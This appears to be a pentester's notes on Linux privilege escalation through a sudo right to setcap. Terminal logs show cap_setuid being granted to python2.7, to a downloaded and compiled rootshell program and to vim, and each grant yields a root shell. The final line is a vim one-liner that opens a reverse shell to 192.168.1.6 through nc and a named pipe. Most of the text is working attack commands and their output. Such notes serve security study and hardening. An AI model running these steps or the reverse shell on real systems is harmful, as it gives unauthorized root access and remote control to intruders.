A file carrying cap_setuid+ep, plus a user allowed to grant it (sudo setcap), is equivalent to root.
Just some notes --
[user@lemur tmp]$ hostname ; id | |
lemur | |
uid=1001(user) gid=1001(user) groups=1001(user) | |
[user@lemur tmp]$ sudo -l | |
Matching Defaults entries for user on this host: | |
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR | |
USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC | |
LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin | |
User user may run the following commands on this host: | |
(ALL) NOPASSWD: /usr/sbin/capsh, (ALL) /usr/sbin/setcap | |
[user@lemur tmp]$ which python2.7 | |
/usr/bin/python2.7 | |
[user@lemur tmp]$ ls -l /usr/bin/python2.7 | |
-rwxr-xr-x. 1 root root 7136 Jun 17 2014 /usr/bin/python2.7 | |
[user@lemur tmp]$ sudo /usr/sbin/setcap cap_setuid+ep /usr/bin/python2.7 | |
[user@lemur tmp]$ getcap /usr/bin/python2.7 | |
/usr/bin/python2.7 = cap_setuid+ep | |
[user@lemur tmp]$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash ")' | |
[root@lemur tmp]# id | |
uid=0(root) gid=1001(user) groups=0(root),1001(user) | |
[root@lemur tmp]# | |
Downloaded SUID shell -- (the SUID bit on a file owned by the unprivileged user cannot give root; it is the cap_setuid grant below that lets setuid(0) succeed, and setgid(0) evidently fails since the gid stays 1001 in the id output)
[user@lemur tmp]$ id | |
uid=1001(user) gid=1001(user) groups=1001(user) | |
[user@lemur tmp]$ curl -sk -O https://raw.githubusercontent.com/jivoi/pentest/master/shell/rootshell.c | |
[user@lemur tmp]$ gcc -o /tmp/rootshell /tmp/rootshell.c | |
[user@lemur tmp]$ cat rootshell.c | |
// gcc -o /tmp/rootshell /tmp/rootshell.c | |
// chmod u+s /tmp/rootshell | |
#include <stdio.h> | |
#include <sys/types.h> | |
#include <unistd.h> | |
int main(void) | |
{ | |
setuid(0); setgid(0); system("/bin/bash"); | |
}
[user@lemur tmp]$ chmod 4755 rootshell
You have new mail in /var/spool/mail/user | |
[user@lemur tmp]$ sudo /usr/sbin/setcap cap_setuid+ep rootshell | |
[user@lemur tmp]$ getcap rootshell | |
rootshell = cap_setuid+ep | |
[user@lemur tmp]$ ./rootshell | |
[root@lemur tmp]# id | |
uid=0(root) gid=1001(user) groups=0(root),1001(user) | |
[root@lemur tmp]# | |
Vim with capabilities (same pattern: the setuid(0) works only because of the cap_setuid grant):
/usr/bin/vim.basic = cap_setuid+ep
vim -c 'py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")' | |
vim -c 'py3 import os;os.setuid(0);os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.6 3434 >/tmp/f")' |